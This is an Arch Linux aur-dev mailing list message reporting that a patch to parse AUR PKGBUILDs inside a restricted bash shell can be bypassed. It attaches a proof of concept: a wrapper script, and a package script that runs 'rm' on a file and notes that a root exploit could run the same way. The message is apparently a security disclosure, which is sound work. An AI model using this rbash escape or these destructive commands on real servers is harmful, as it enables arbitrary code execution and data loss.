[aur-dev] [PATCH] Use bash script to parse pkgbuilds

Simo Leone simo at archlinux.org
Fri Jun 20 04:22:40 EDT 2008

On Fri, Jun 20, 2008 at 12:54:29AM +0800, Callan Barrett wrote:
> Here's another iteration of this patch, I'm still looking for as much
> input as possible but this is basically what I would push to testing
> at this point. The script now outputs in a different format to be
> parsed and there is some cleanup done in pkgsubmit.php to get it
> working more cleanly with the script.
Unfortunately Callan and I found a way to easily defeat this tonight,
the proof-of-concept is attached, the attack is based on this little bit
about restricted shells (from the manpage):
When a command that is found to be a shell script is executed (see COM-
MAND EXECUTION above), rbash turns off any restrictions  in  the shell
spawned to execute the script.

Too bad too, real bash parsing would have been nice :/

-------------- next part --------------
ulimit -t 1
export PATH=''
exec /bin/bash --noprofile --norc --restricted << EOF
source TEST
[ -n "\$pkgname" ] && echo -e "%PKGNAME%\n\$pkgname\n"
-------------- next part --------------

-------------- next part --------------

/bin/ls -l /
/bin/rm /home/simo/foobar

# anything else could be executed here.... for instance a root exploit uploaded
# with the package

# this doesnt infinite loop because oddly enough ulimit still applies
# and cannot be changed
#while [ 0 -eq 0 ]; do
#    echo "you got fucked son"
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
URL: <http://archlinux.org/pipermail/aur-dev/attachments/20080620/acf7b964/attachment.pgp>

More information about the aur-dev mailing list